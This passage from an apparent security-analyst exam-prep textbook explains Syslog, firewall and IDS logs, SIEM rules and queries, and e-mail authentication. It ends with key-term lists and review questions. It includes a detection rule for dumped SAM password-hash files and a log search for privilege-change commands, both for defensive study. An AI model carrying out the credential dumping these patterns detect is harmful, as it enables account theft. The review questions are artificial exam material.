successfully compromised the network. In this case, it is likely
that no one was reviewing the IDS event logs. Consider another
example of insufficient logging and mechanisms for review. Say
that an organization did not know its internal financial
databases were compromised until the attacker published
sensitive portions of the database on several popular attacker
websites. The organization was unable to determine when, how,
or who conducted the attacks but rebuilt, restored, and updated
the compromised database server to continue operations. If the
organization is unable to determine these specifics, it needs to
look at the configuration of its system, audit, and security logs.
Syslog
Syslog is a protocol that can be used to collect logs from
devices and store them in a central location called a Syslog
server. Syslog provides a simple framework for log entry
generation, storage, and transfer that any OS, security software,
or application could use if designed to do so. Many log sources
either use Syslog as their native logging format or offer features
that allow their logging formats to be converted to Syslog
format.
Syslog messages all follow the same format because they have,
for the most part, been standardized. The Syslog packet size is
limited to 1024 bytes and carries the following information:
Facility: The source of the message. The source can be the
operating system, the process, or an application.
Severity: Rated using the following scale:
0 Emergency: System is unusable.
1 Alert: Action must be taken immediately.
2 Critical: Critical conditions.
3 Error: Error conditions.
4 Warning: Warning conditions.
5 Notice: Normal but significant conditions.
6 Informational: Informational messages.
7 Debug: Debug-level messages.
Source: The log from which this entry came.
Action: The action taken on the packet.
Source: The source IP address and port number.
Destination: The destination IP address and port number.
Each Syslog message has only three parts. The first part
specifies the facility and severity as numeric values. The second
part of the message contains a timestamp and the hostname or
IP address of the source of the log. The third part is the actual
log message, with content as shown here:
seq no:timestamp: %facility-severity-MNEMONIC: description
In the following sample Syslog message, generated by a Cisco
router, no sequence number is present (it must be enabled), the
timestamp shows 47 seconds since the log was cleared, the
facility is LINK (an interface), the severity is 3, the type of event
is UP/DOWN, and the description is “Interface
GigabitEthernet0/2, changed state to up”:
00:00:47: %LINK-3-UPDOWN: Interface GigabitEthernet0/2, changed state to up
This example is a locally generated message on the router and
not one sent to a Syslog server. When a message is sent to the
Syslog server, it also includes the IP address of the device
sending the message to the Syslog server. Figure 11-10 shows
some output from a Syslog server that includes this additional
information.
Figure 11-10 Syslog Server
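Applications can also emit Syslog messages directly. As a minimal sketch, the following Python fragment uses the standard library's SysLogHandler to forward log records to a Syslog server (the server hostname here is hypothetical) over UDP port 514:

import logging
import logging.handlers

# Forward log records to a Syslog server over UDP port 514.
handler = logging.handlers.SysLogHandler(
    address=("syslog.example.com", 514),
    facility=logging.handlers.SysLogHandler.LOG_LOCAL0,
)
logger = logging.getLogger("app")
logger.addHandler(handler)
logger.setLevel(logging.INFO)

logger.warning("Interface GigabitEthernet0/2 changed state to down")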
The following is a standard Syslog message, and its parts are
explained in Table 11-4:
*May 1 23:02:27.143: %SEC-6-IPACCESSLOGP: list ACL-IPv4-E0/0-IN permitted tcp 192.168.1.3(1026) -> 192.168.2.1(80), 1 packet
While Syslog message formats differ based on the device and
the type of message, this is a typical format for a security-related
message.
Table 11-4 Parts of a Standard Syslog Message

Time/day: *May 1 23:02:27.143
Facility: %SEC (security)
Severity: 6 Informational: Informational messages
Source: IPACCESSLOGP: list ACL-IPv4-E0/0-IN (name of access list)
Action: Permitted
From: 192.168.1.3 port 1026
To: 192.168.2.1 port 80
Amount: 1 packet
No standard fields are defined within the message content; it is
intended to be human readable, and not easily machine
parsable. This provides very high flexibility for log generators,
which can place whatever information they deem important
within the content field, but it makes automated analysis of the
log data very challenging. A single source may use many
different formats for its log message content, so an analysis
program needs to be familiar with each format and should be
able to extract the meaning of the data from the fields of each
format. This problem becomes much more challenging when log
messages are generated by many sources. It might not be
feasible to understand the meaning of all log messages, and
analysis might be limited to keyword and pattern searches.
Some organizations design their Syslog infrastructures so that
similar types of messages are grouped together or assigned
similar codes, which can make log analysis automation easier to
perform.
As log security has become a greater concern, several
implementations of Syslog have been created that place a
greater emphasis on security. Most have been based on IETF’s
RFC 3195, which was designed specifically to improve the
security of Syslog. Implementations based on this standard can
support log confidentiality, integrity, and availability through
several features, including reliable log delivery, transmission
confidentiality protection, and transmission integrity protection
and authentication.
Kiwi Syslog Server
Kiwi Syslog Server is log management software that provides
centralized storage of log data and SNMP data from Windows-
and Linux-based hosts and appliances. While Kiwi combines
the functions of SNMP collector and log manager, it lacks many
of the features found in other systems; however, it is very
economical.
Firewall Logs
Examining a firewall log can be somewhat daunting at first. But
if you understand the basic layout and know what certain
acronyms stand for, you can usually find your way around a
firewall log. The following are some examples of common
firewalls.
Windows Defender
The Windows operating system includes the Windows Defender
Firewall. The default path for its log is
%windir%\system32\logfiles\firewall\pfirewall.log. Figure 11-11
shows the Windows Defender Firewall with Advanced Security
interface.
Figure 11-11 Windows Defender Interface
Check Point
A Check Point log follows this format:
Time | Action | Firewall | Interface | Product | Source | Source Port | Destination | Service | Protocol | Translation | Rule
Note
These fields are used when allowing or denying traffic. Other actions, such as a
change in an object, use different fields that are beyond the scope of this
discussion.
Table 11-5 shows the meaning of each field.
Table 11-5 Check Point Firewall Fields

Time: Local time on the management station.
Action: Accept, deny, or drop. Accept means accept or pass the packet, deny means send a TCP reset or ICMP port unreachable message, and drop means drop the packet with no error to the sender.
Firewall: IP address or hostname of the enforcement point.
Interface: Firewall interface on which the packet was seen.
Product: Firewall software running on the system that generated the message.
Source: Source IP address of the packet sender.
Destination: Destination IP address of the packet.
Service: Destination port or service of the packet.
Protocol: Usually a Layer 4 protocol of the packet (TCP, UDP, and so on).
Translation: The new source or destination address. (This shows only if NAT is occurring.)
Rule: Rule number from the GUI rule base that caught this packet and caused the log entry. (This should be the last field, regardless of the presence or absence of other fields except for resource messages.)
This is what a line from the log might look like:
14:55:20 accept bd.pearson.com >eth1 product VPN-1 & Firewall-1 src 10.5.5.1 s_port 4523 dst xx.xxx.10.2 service http proto tcp xlatesrc xxx.xxx.146.12 rule 15
This is a log entry for permitted HTTP traffic sourced from
inside (eth1) with NAT. Table 11-6 describes the meanings of the
fields.
Table 11-6 Firewall Log Entry Field Meanings

Time: 14:55:20
Action: accept
Firewall: bd.pearson.com
Interface: eth1
Product: VPN-1 & Firewall-1
Source: 10.5.5.1 port 4523
Destination: xx.xxx.10.2
Service: http
Protocol: tcp
Translation: to xxx.xxx.146.12
Rule: rule 15
While other logs may be slightly different, if you understand the
examples shown here, you should be able to figure them out
pretty quickly.
Web Application Firewall (WAF)
A web application firewall (WAF) applies rule sets to an
HTTP conversation and examines all web input before
processing. These rule sets cover common attack types to which
these session types are susceptible. Among the common attacks
they address are cross-site scripting and SQL injections. A WAF
can be implemented as an appliance or as a server plug-in. In
appliance form, a WAF is typically placed directly behind the
firewall and in front of the web server farm; Figure 11-12 shows
an example.
Figure 11-12 Placement of a WAF
While all traffic is usually funneled inline through the device,
some solutions monitor a port and operate out-of-band. Table
11-7 lists the pros and cons of these two approaches. Finally,
WAFs can be installed directly on the web servers themselves.
The security issues involved with WAFs include the following:
The IT infrastructure becomes more complex.
Training on the WAF must be provided with each new release of the
web application.
Testing procedures may change with each release.
False positives may occur and can have a significant business
impact.
Troubleshooting becomes more complex.
The WAF terminating the application session can potentially have
an effect on the web application.
Table 11-7 Advantages and Disadvantages of WAF Placement Options

Inline. Advantages: Can prevent live attacks. Disadvantages: May slow web traffic; could block legitimate traffic.
Out-of-band. Advantages: Nonintrusive; doesn't interfere with traffic. Disadvantages: Can't block live traffic.
An example of a WAF log file is shown in Figure 11-13. In it, you
can see a number of entries regarding a detected threat
attempting code tampering.
Figure 11-13 WAF Log File
Proxy
Proxy servers can be appliances, or they can be software that is
installed on a server operating system. These servers act like a
proxy firewall in that they create the web connection between
systems on their behalf, but they can typically allow and
disallow traffic on a more granular basis. For example, a proxy
server may allow the Sales group to go to certain websites while
not allowing the Data Entry group access to those same sites.
The functionality extends beyond HTTP to other traffic types,
such as FTP traffic.
Proxy servers can provide an additional beneficial function
called web caching. When a proxy server is configured to
provide web caching, it saves a copy of all web pages that have
been delivered to internal computers in a web cache. If any user
requests the same page later, the proxy server has a local copy
and need not spend the time and effort to retrieve it from the
Internet. This greatly improves web performance for frequently
requested pages.
Figure 11-14 shows a view of a proxy server log. This is from the
Proxy Server CCProxy for Internet Monitoring. This view shows
who is connected and what they are doing.
Figure 11-14 Proxy Server Log
Intrusion Detection System (IDS)/Intrusion Prevention
System (IPS)
An intrusion detection system (IDS) creates a log of every
event that occurs. An intrusion prevention system (IPS)
goes one step further and can take actions to stop an intrusion.
Figure 11-15 shows output from an IDS. In the output, you can
see that for each intrusion attempt, the source and destination
IP addresses and port numbers are shown, along with a
description of the type of intrusion. In this case, all the alerts
have been generated by the same source IP address. Because
this is a private IP address, it is coming from inside your
network. It could be a malicious individual, or it could be a
compromised host under the control of external forces. As a
cybersecurity analyst, you should either block that IP address or
investigate to find out who has that IP address.
FIGURE 11-15 IDS Log
While the logs are helpful, one of the real values of an IDS is its
ability to present the data it collects in meaningful ways in
reports. For example, Figure 11-16 shows a pie chart created to
show the intrusion attempts and the IP addresses from which
the intrusions were sourced.
Figure 11-16 IDS Report Showing Blocked Intrusions by
Sources
Sourcefire
Sourcefire (now owned by Cisco) created products based on
Snort (covered in the next section). The devices Sourcefire
created were branded as Firepower appliances. These products
were next-generation IPSs (NGIPSs) that provided network
visibility into hosts, operating systems, applications, services,
protocols, users, content, network behavior, and network
attacks and malware. Sourcefire also included integrated
application control, malware protection, and URL filtering.
Figure 11-17 shows the Sourcefire Defense Center displaying the
numbers of events in the last hour in a graph. All the services
provided by these products are now incorporated into Cisco
firewall products. For more information on Sourcefire, see
https://www.cisco.com/c/en/us/services/acquisitions/sourcefire.html.
Figure 11-17 Sourcefire
Snort
Snort is an open source NIDS on which Sourcefire products are
based. It can be installed on Fedora, CentOS, FreeBSD, and
Windows. The installation files are free, but you need a
subscription to keep rule sets up to date. Figure 11-18 shows a
Snort report that has organized the traffic in the pie chart by
protocol. It also lists all events detected by various signatures
that have been installed. If you scan through the list, you can
see attacks such as URL host spoofing, oversized packets, and,
in row 10, a SYN FIN scan.
FIGURE 11-18 Snort
Zeek
Zeek is another open source NIDS. It is only supported on
Unix/Linux platforms. It is not as user friendly as Snort in that
configuring it requires more expertise. Like many other open
source products, it is supported by a nonprofit organization
called the Software Freedom Conservancy.
HIPS
A host-based IPS (HIPS) monitors traffic on a single system. Its
primary responsibility is to protect the system on which it is
installed. HIPSs typically work closely with anti-malware
products and host firewall products. They generally monitor the
interaction of sites and applications with the operating system
and stop any malicious activity or, in some cases, ask the user to
approve changes that the application or site would like to make
to the system. An example of a HIPS is SafenSoft SysWatch.
IMPACT ANALYSIS
When the inevitable security event occurs, especially if it results
in a successful attack, the impact of the event must be
determined. Impact analysis must be performed on several
levels to yield useful information. In Chapter 15, “The Incident
Response Process,” and Chapter 16, “Applying the Appropriate
Incident Response Procedure,” you will learn more about the
incident response process, but for now understand that the
purpose of an impact analysis is to
Identify what systems were impacted
Determine what role the quality of the response played in the
severity of the issue
For the future, associate the attack type with the systems that were
impacted
Organization Impact vs. Localized Impact
Always identify the boundaries of the attack or issue if possible.
This may result in a set of impacts that affected one small area
or environment while another set of issues may have impacted a
larger area. Defining those boundaries helps you to anticipate
the scope of a similar attack of that type in the future.
You might find yourself in a scenario where one office or LAN is
affected while others are not affected (localized). Even when
that is the case, it could result in a wider organizational impact.
For example, if a local office hosts all the database servers and
the attack is local to that office, it could mean database issues
for the entire organization.
Immediate Impact vs. Total Impact
While many attacks cause an immediate issue, some attacks
(especially some of the more serious) take weeks and months to
reveal their damage. When attacks occur, be aware of such a lag
in the effect and ensure that you continue to gather information
that can be correlated with previous attacks. The immediate
impact is what you see that alerts you, but the total impact
might not be known for weeks.
SECURITY INFORMATION AND EVENT
MANAGEMENT (SIEM) REVIEW
For large enterprises, the amount of log data that needs to be
analyzed can be quite large. For this reason, many organizations
implement security information and event
management (SIEM), which provides an automated solution
for analyzing events and deciding where the attention needs to
be given. Most SIEM products support two ways of collecting
logs from log generators:
Agentless: With this type of collection, the SIEM server receives
data from the individual hosts without needing to have any special
software installed on those hosts. Some servers pull logs from the
hosts, which is usually done by having the server authenticate to
each host and retrieve its logs regularly. In other cases, the hosts
push their logs to the server, which usually involves each host
authenticating to the server and transferring its logs regularly.
Regardless of whether the logs are pushed or pulled, the server then
performs event filtering and aggregation and log normalization and
analysis on the collected logs.
Agent-based: With this type of collection, an agent program is
installed on the host to perform event filtering and aggregation and
log normalization for a particular type of log. The host then
transmits the normalized log data to a SIEM server, usually on a
real-time or near-real-time basis, for analysis and storage. Multiple
agents may need to be installed if a host has multiple types of logs
of interest. Some SIEM products also offer agents for generic
formats such as Syslog and SNMP. A generic agent is used primarily
to get log data from a source for which a format-specific agent and
an agentless method are not available. Some products also allow
administrators to create custom agents to handle unsupported log
sources.
There are advantages and disadvantages to each method. The
primary advantage of the agentless approach is that agents do
not need to be installed, configured, and maintained on each
logging host. The primary disadvantage is the lack of filtering
and aggregation at the individual host level, which can cause
significantly larger amounts of data to be transferred over
networks and increase the amount of time it takes to filter and
analyze the logs. Another potential disadvantage of the
agentless method is that the SIEM server may need credentials
for authenticating to each logging host. In some cases, only one
of the two methods is feasible; for example, there might be no
way to remotely collect logs from a particular host without
installing an agent onto it.
Rule Writing
One of the key issues to a successful SIEM implementation is
the same issue you face with your firewall, IDS, and IPS
implementations: how to capture useful and actionable
information while reducing the amount of irrelevant data
(noise) from the collection process. Moreover, you want to
reduce the number of errors—false positives and false negatives
—the SIEM system makes. To review these error types, see
Chapter 3, “Vulnerability Management Activities.”
The key to reducing the amount of irrelevant data (noise) and
the number of errors is to write rules that guide the system in
making decisions. Rules are classified by the rule type. Some
example rule types are
Single event rule: If condition A happens, trigger an action.
Many-to-one or one-to-many rules: Correlate condition A
across many sources and one target, or one source and many
targets (as in scanning and sweep scenarios).
Cause-and-effect rules: If condition A matches and leads to
condition B, take an action. Example: “password-guessing failure
followed by successful login” type scenarios. (A minimal
correlation sketch follows this list.)
Transitive rules or tracking rules: Here, the target in the first
event (a malware infection) becomes the source in the second event
(malware infection of another machine). This is typically used in
worm/malware outbreak scenarios.
Trending rules: Track several conditions over a time period,
based on thresholds. This happens in DoS or DDoS scenarios.
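As promised in the cause-and-effect item above, here is a minimal Python sketch of that rule type. The event feed format (source IP and outcome tuples in time order) and failure threshold are hypothetical:

from collections import defaultdict

FAILURE_THRESHOLD = 3  # hypothetical trigger level

def detect_guess_then_login(events):
    # events: iterable of (source_ip, outcome) tuples in time order,
    # where outcome is "failure" or "success".
    failures = defaultdict(int)
    for source_ip, outcome in events:
        if outcome == "failure":
            failures[source_ip] += 1
        elif outcome == "success" and failures[source_ip] >= FAILURE_THRESHOLD:
            print(f"ALERT: {source_ip} succeeded after "
                  f"{failures[source_ip]} failed attempts")
            failures[source_ip] = 0

detect_guess_then_login([
    ("10.0.0.7", "failure"), ("10.0.0.7", "failure"),
    ("10.0.0.7", "failure"), ("10.0.0.7", "success"),
])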
Known-Bad Internet Protocol (IP)
Many SIEM solutions include the capability to recognize IP
addresses and domain names from which malicious traffic has
been sourced in the past. IP, URL, and domain reputation data
is derived from the aggregated information of all the customers
of the SIEM solution. The system then prioritizes response
efforts by identifying known bad actors and infected sites.
This reputational data has another use as well. If your
organization’s IP addresses or domains appear in a blacklist or a
hacker forum, chances are that one or more of these systems
have been compromised, and compromise of public systems like
web servers can be just the tip of the iceberg, requiring further
investigation.
Dashboard
SIEM products usually include support for several dozen types
of log sources, such as OSs, security software, application
servers (for example, web servers and e-mail servers), and even
physical security control devices such as badge readers. For
each supported log source type, except for generic formats such
as Syslog, the SIEM products typically know how to categorize
the most important logged fields. This significantly improves
the normalization, analysis, and correlation of log data over that
performed by software with a less granular understanding of
specific log sources and formats. Also, the SIEM software can
perform event reduction by disregarding data fields that are not
significant to computer security, potentially reducing the SIEM
software’s network bandwidth and data storage usage. Figure
11-19 shows output from a SIEM system. Notice the various
types of events that have been recorded.
FIGURE 11-19 SIEM Output
The tool in Figure 11-19 shows the name or category within
which each alert falls (Name column), the attacker’s address, if
captured, the target IP address, and the priority of the alert
(Priority column, denoted by color). Given this output, the
suspicious FTP traffic (high priority) needs to be investigated.
While only three are shown on this page, if you look at the top-right corner, you can see that there are a total of 83 alerts with
high priority, many of which are likely to be suspicious e-mail
attachments.
The following are examples of product dashboards:
ArcSight: ArcSight, owned by Micro Focus, sells SIEM systems that collect
security log data from security technologies, operating systems,
applications, and other log sources and analyze that data for signs
of compromise, attacks, or other malicious activity. The solution
comes in a number of models, based on the number of events the
system can process per second and the number of devices
supported. The selection of the model is important to ensure that
the device is not overwhelmed trying to access the traffic. This
solution also can generate compliance reports for HIPAA, SOX, and
PCI DSS. For more information, see
https://www.microfocus.com/en-us/products/siem-log-management/overview.
QRadar: The IBM SIEM solution, QRadar, purports to help
eliminate noise by applying advanced analytics to chain multiple
incidents together and identify security offenses requiring action.
Purchase also permits access to the IBM Security App Exchange for
threat collaboration and management. For information, see
https://www.ibm.com/security/security-intelligence/qradar.
Splunk: Splunk is a SIEM system that can be deployed as a
premises-based or cloud-based solution. The data it captures can be
analyzed using searches written in Splunk Search Processing
Language (SPL). Splunk uses machine-driven data imported by
connectors or add-ons. For example, the Splunk add-on for Oracle
Database allows a Splunk software administrator to collect and
ingest data from an Oracle database server. See more at
https://www.splunk.com/en_us/cyber-security.html.
AlienVault/OSSIM: AlienVault (now AT&T Cybersecurity)
produces both commercial and open source SIEM systems. Open
Source Security Information Management (OSSIM) is the open
source version, and the commercially available AlienVault Unified
Security Management (USM) goes beyond traditional SIEM
software with all-in-one security essentials and integrated threat
intelligence. Figure 11-20 shows the Executive view of the
AlienVault USM console. See more at
https://cybersecurity.att.com.
Figure 11-20 AlienVault
QUERY WRITING
Queries are simply questions formed and used to locate data
that matches specific characteristics. Query writing is the
process of forming a query that locates the information for
which you are looking. Properly formed queries can help you to
locate the security needle in the haystack when it comes to
analyzing log data. We’ve already discussed the vast amount of
information that can be collected by SIEM and other types of
systems.
Sigma is an open standard for writing rules that allow you to
describe searches on log data in generic form. These rules can
be converted and applied to many log management or SIEM
systems and can even be used with grep on the command line.
The following is an example of converting a rule written using
Sigma. The sigmac converter is invoked with a target of splunk
against the rule file sysmon_quarkspw_filedump.yml; the resulting
Splunk search looks for an event with an ID of 11:

$ python3 sigmac -t splunk ../rules/windows/sysmon/sysmon_quarkspw_filedump.yml
(EventID="11" TargetFileName="*\AppData\Local\Temp\SAM-*.dmp*")
String Search
String searches are used to look within a log file or data
stream and locate any instances of a given string. A string can be
any combination of letters, numbers, and other characters.
String searches are used to locate malware and to locate strings
that are used in attacks or typically accompany an attack.
String searches can be performed by using either search
algorithms or regular expressions, but many audit tools such as
SIEM (and many sniffers as well) offer GUI tools that allow you
to form the search by choosing from options. Figure 11-21 shows
a simple search formed in Splunk to filter out all but items
including either of two strings, visudo or usermod.
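The equivalent search can also be expressed outside Splunk with a regular expression. The following Python sketch (the log filename is hypothetical) prints every line containing either string:

import re

pattern = re.compile(r"visudo|usermod")

with open("auth.log") as f:  # hypothetical log file
    for line_number, line in enumerate(f, start=1):
        if pattern.search(line):
            print(f"{line_number}: {line.rstrip()}")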
Script
Scripts can be used to combine and orchestrate functions or to
automate responses. A simple example is the following script
that tests for the presence of lowercase letters in passwords and
responds when no lowercase letter is present:
chop=$(echo "$password" | sed -E 's/[[:lower:]]//g')  # strip all lowercase letters
echo "chopped to $chop"
if [ "$password" == "$chop" ] ; then
    echo "Fail: You haven't used any lowercase letters."
fi
FIGURE 11-21 String Search in Splunk
Piping
Piping is the process of sending the output of one function to
another function as its input. Piping is used in scripting to link
together functions and orchestrate their operation. The symbol |
denotes a pipe. For example, in the following Linux command,
by piping the output of the cat filename command to the less
command, the less command alters the display of the output:
cat filename | less
Normally the output would scroll all the way to the end of the
file; the less command instead pages the output one screen at a
time.
Another use of piping is to search for a set of items and then use
a second function to search within that set or to perform some
process on that output.
E-MAIL ANALYSIS
One of the most popular avenues for attacks is a tool we all must
use every day, e-mail. This section covers several attacks that
use e-mail as the vehicle. In most cases the best way to prevent
these attacks is user training and awareness, because many of
these attacks are based upon poor security practices on the part
of the user. E-mail analysis is a part of security monitoring.
E-mail Spoofing
E-mail spoofing is the process of sending an e-mail that appears
to come from one source when it really comes from another. It
is made possible by altering the fields of e-mail headers such as
From, Return Path, and Reply-to. Its purpose is to convince the
receiver to trust the message and reply to it with some sensitive
information that the receiver would not have shared unless it
was a trusted message.
Often this is one step in an attack designed to harvest
usernames and passwords for banking or financial sites. This
attack can be mitigated in several ways. One is SMTP
authentication, which when enabled, disallows the sending of
an e-mail by a user that cannot authenticate with the sending
server.
Malicious Payload
E-mail is a frequent carrier of malware; in fact, e-mail is the
most common vehicle for infecting computers with malware.
You should employ malware scanning software on both the
client machines and the e-mail server. Despite taking this
measure, malware can still get through, and it is imperative to
educate users to follow safe e-mail handling procedures (such as
not opening attachments from unknown sources). Training
users is critical.
DomainKeys Identified Mail (DKIM)
DomainKeys Identified Mail (DKIM) allows you to verify
the source of an e-mail. It provides a method for validating a
domain name identity that is associated with a message through
cryptographic authentication. Figure 11-22 shows the process.
As you can see, the e-mail server verifies the domain name (actually what's called the DKIM signature) with the DNS server before delivering the e-mail.
Figure 11-22 DKIM Process
Sender Policy Framework (SPF)
Another possible mitigation technique is to implement the Sender Policy Framework (SPF). SPF is an e-mail validation system that uses DNS to determine whether an e-mail was sent by a host sanctioned by the sending domain's administrator. If the message can't be validated, it is not delivered to the recipient's mailbox.
Domain-based Message Authentication, Reporting, and
Conformance (DMARC)
Domain-based Message Authentication, Reporting, and Conformance (DMARC) is an e-mail authentication and reporting protocol that builds on SPF and DKIM, which authenticate e-mails to ensure they come from a valid source. All U.S. federal agencies are required to implement this standard. A DMARC policy allows a sender's domain to indicate that its e-mails are protected by SPF and/or DKIM and tells a receiver what to do if neither of those authentication methods passes, such as rejecting or quarantining the message.
Figure 11-23 illustrates a workflow whereby DMARC
implements both SPF and DKIM, along with a virus filter.
Figure 11-23 DMARC
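Because SPF, DKIM, and DMARC policies are all published as DNS TXT records, you can inspect a domain's e-mail authentication posture directly from the command line. The following is a quick sketch using dig; example.com and the selector1 DKIM selector are placeholders, and the actual selector name varies by sender:

$ dig +short TXT example.com                        # SPF record, e.g., "v=spf1 ..."
$ dig +short TXT selector1._domainkey.example.com   # DKIM public key record
$ dig +short TXT _dmarc.example.com                 # DMARC policy, e.g., "v=DMARC1; p=quarantine"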
Phishing
Phishing is a social engineering attack in which attackers try
to learn personal information, including credit card information
and financial data. This type of attack is usually carried out by
implementing a fake website that very closely resembles a
legitimate website. Users enter data, including credentials, on
the fake website, allowing the attackers to capture any
information entered.
As a part of assessing your environment, you should send out
phishing e-mails to assess the willingness of your users to
respond. A high number of successes indicates that users need
training to prevent successful phishing attacks.
Spear Phishing
Spear phishing is the process of directing a phishing attack at a specific person rather than a random set of people. The attack can be made more convincing by learning details about the target's habits and likes through social media, details the e-mail can reference to boost its appearance of legitimacy. Spear phishing attacks take longer to carry out than ordinary phishing attacks because of the information that must be gathered.
Whaling
Just as spear phishing is a subset of phishing, whaling is a
subset of spear phishing. It targets a single person, and in the
case of whaling, that person is someone of significance or
importance. It might be a CEO, COO, or CTO, for example. The
attack is based on the assumption that these people have more
sensitive information to divulge.
Note
Pharming is similar to phishing, but pharming pollutes the contents of a computer's DNS cache so that requests to a legitimate site are actually routed to an alternate site.
Caution users against using any links embedded in e-mail messages, even if a message appears to have come from a legitimate entity. Users should also review the address bar any time they access a site where their personal information is required, to ensure that the site is correct and that SSL/TLS is being used, which is indicated by https:// at the beginning of the URL.
Forwarding
No one enjoys the way our e-mail boxes fill every day with
unsolicited e-mails, usually trying to sell us something. In many
cases we cause ourselves to receive this e-mail by not paying
close attention to all the details when we buy something or visit
a site. When e-mail is sent out on a mass basis that is not
requested, it is called spam.
Spam is more than an annoyance because it can clog e-mail
boxes and cause e-mail servers to spend resources delivering it.
Sending spam is illegal in many jurisdictions, so many spammers try to hide the source of the spam by relaying or forwarding it through other corporations' e-mail servers. Not only does this practice hide the e-mail's true source, but it can also get the relaying company in trouble.
Today's e-mail servers can deny relaying to any e-mail servers that you do not specify, which prevents your e-mail system from being used as a spamming mechanism; this type of open relaying should be disallowed on your e-mail servers. In addition, spam filters can be implemented on personal e-mail, such as web-based e-mail clients.
Digital Signature
A digital signature added to an e-mail is a hash value
encrypted with the sender’s private key. A digital signature
provides authentication, non-repudiation, and integrity. A blind
signature is a form of digital signature where the contents of the
message are masked before it is signed. The process for creating
a digital signature is as follows:
1. The signer obtains a hash value for the data to be signed.
2. The signer encrypts the hash value using her private key.
3. The signer attaches the encrypted hash and a copy of her public key
in a certificate to the data and sends the message to the receiver.
The process for verifying the digital signature is as follows:
1. The receiver separates the data, encrypted hash, and certificate.
2. The receiver obtains the hash value of the data.
3. The receiver verifies that the public key is still valid by using the
PKI.
4. The receiver decrypts the encrypted hash value using the public
key.
5. The receiver compares the two hash values. If the values are the
same, the message has not been changed.
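These two processes can be exercised at the command line with OpenSSL. The following is a minimal sketch, assuming the sender's key pair is stored in sender_key.pem and sender_pub.pem (the filenames are placeholders):

# Sender: hash message.txt and sign the digest with the private key
$ openssl dgst -sha256 -sign sender_key.pem -out message.sig message.txt

# Receiver: recompute the hash and verify it against the signature
$ openssl dgst -sha256 -verify sender_pub.pem -signature message.sig message.txt
Verified OK

If even one byte of message.txt changes after signing, the verification fails, which is how the signature provides integrity.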
Public key cryptography, discussed in Chapter 8, “Security
Solutions for Infrastructure Management,” is used to create
digital signatures. Users register their public keys with a
certificate authority (CA), which distributes a certificate
containing the user’s public key and the CA’s digital signature.
The CA's digital signature on the certificate is computed over the user's public key and validity period, combined with the certificate issuer and digital signature algorithm identifier.
The Digital Signature Standard (DSS) is the U.S. federal government digital signature standard that governs the Digital Signature Algorithm (DSA). DSA generates a message digest of
160 bits. The U.S. federal government requires the use of DSA,
RSA, or Elliptic Curve DSA (ECDSA) and SHA for digital
signatures. DSA is slower than RSA and provides only digital
signatures. RSA provides digital signatures, encryption, and
secure symmetric key distribution. In a review of cryptography,
keep the following facts in mind:
Encryption provides confidentiality.
Hashing provides integrity.
Digital signatures provide authentication, non-repudiation, and
integrity.
E-mail Signature Block
An e-mail signature block is a set of information, such as
name, e-mail address, company title, and credentials, that
usually appears at the end of an e-mail. Many organizations
choose to determine the layout of the signature block and its
contents to achieve consistency in how the company appears to
the outside world. Another reason for this, however, is to
prevent the disclosure of information that could be used at
some point in time for an attack.
It is also important to control what users can put in these
signature blocks to ensure that users do not inadvertently create
a legal obligation on the part of the organization.
Embedded Links
Many times, e-mails are received that have embedded links in them. The link text may appear to lead to one site, but if you hover over the link (revealing what is called an embedded link), the actual destination is shown, and the two may be completely different. There's not much you can do to prevent users from clicking these links other than train them to review the embedded links in e-mails before accessing them.
Impersonation
Impersonation is the process of acting as another entity and
is done to gain unauthorized access to resources or networks. It
can be done by adopting another’s IP address, MAC address, or
user account. It can also be done at the e-mail level. E-mail can
be spoofed by altering the SMTP header of the e-mail. This
allows the e-mail to appear to come from another source.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 11-8
lists a reference of these key topics and the page numbers on
which each is found.
Table 11-8 Key Topics in Chapter 11

Key Topic Element | Description | Page Number
Figure 11-1 | Trend analysis | 321
Bulleted list | Endpoint protection platforms (EPPs) | 322
Bulleted list | Malware types | 323
Bulleted list | Virus types | 324
Figure 11-2 | Botnet | 326
Bulleted list | Integrity checking methods | 327
Bulleted list | Reverse engineering tools | 328
Figure 11-3 | Secure memory | 331
Figure 11-4 | Runtime data integrity check | 331
Bulleted list | Memory-reading tools | 332
Table 11-2 | Runtime debugging tools | 332
Bulleted list | Indicators of a compromised application | 334
Bulleted list | Social engineering threats | 335
Bulleted list | Server attacks | 337
Bulleted list | Database security terms | 339
Table 11-3 | SFC switches | 341
Section | Description of user and entity behavior analytics (UEBA) | 341
Figure 11-6 | Domain generation algorithm | 344
Bulleted list | Syslog information | 350
Table 11-4 | Parts of a standard Syslog message | 352
Table 11-5 | Check Point Firewall fields | 354
Section | Description of web application firewall (WAF) | 355
Table 11-7 | Advantages and disadvantages of WAF placement options | 356
Bulleted list | SIEM collection types | 362
Bulleted list | Search rule types | 363
Figure 11-22 | DKIM process | 368
Numbered lists | Processes for creating and verifying a digital signature | 371
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
heuristics
trend analysis
NIST SP 800-128
mobile code
virus
worm
Trojan horse
logic bomb
adware
spyware
botnet
rootkit
ransomware
reverse engineering
isolation
sandboxing
hashing
decomposition
runtime data integrity check
secured memory
memory dumping
runtime debugging
rogue endpoints
rogue access points
denial-of-service (DoS) attack
buffer overflow
emanations
backdoor/trapdoor
inference
aggregation
contamination
user and entity behavior analytics (UEBA)
domain generation algorithm (DGA)
flow analysis
NetFlow
packet analysis
protocol analysis
Syslog
web application firewall (WAF)
proxy
intrusion detection system (IDS)
intrusion prevention system (IPS)
impact analysis
security information and event management (SIEM)
query writing
string searches
piping
DomainKeys Identified Mail (DKIM)
Domain-based Message Authentication, Reporting, and Conformance (DMARC)
Sender Policy Framework (SPF)
phishing
forwarding
digital signature
e-mail signature block
embedded links
impersonation
REVIEW QUESTIONS
1. ActiveX, Java, and JavaScript are examples of
_______________.
2. List and define at least two types of viruses.
3. Match the following terms with their definitions.
Terms | Definitions
Rootkit | Taking something apart to discover how it works and perhaps to replicate it
Ransomware | Place where it is safe to probe and analyze malware
Reverse engineering | A set of tools that a hacker can use on a computer after he has managed to gain access and elevate his privileges to administrator
Sandbox | Prevents or limits users from accessing their systems until they pay money
4. ____________________ is a partition designated as
security-sensitive.
5. List and define at least two forms of social engineering.
6. Match the following terms with their definitions.
Terms | Definitions
